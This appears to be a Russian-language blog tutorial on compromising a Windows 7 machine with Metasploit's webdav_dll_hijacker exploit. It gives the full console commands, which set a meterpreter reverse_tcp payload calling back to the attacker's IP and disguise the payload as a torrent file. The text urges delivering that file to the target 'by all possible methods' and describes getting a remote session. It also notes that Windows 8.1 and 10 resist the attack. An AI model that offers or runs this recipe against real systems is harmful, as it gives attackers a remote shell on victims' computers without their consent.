С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, я буду использовать десктоп с установленной Windows 7. Итак, запустив Metasploit, вводим следующее: > use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит) > msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки) > set lhost 192.168.0.104 (Определим адрес атакующего хоста) > set extensions torrent (Выберем тип расширения файла) > exploit (Запустим работу фреймворка) Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост. Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка: В консоли атакующего хоста видим сигнализационные сообщения: Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл: После его запуска, откроется активная сессия meterpreter: Проверка - В опциях эксплойта, можно изменить директорию и название полезной нагрузки: При попытке применить эксплоит к Windows 8.1: Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows.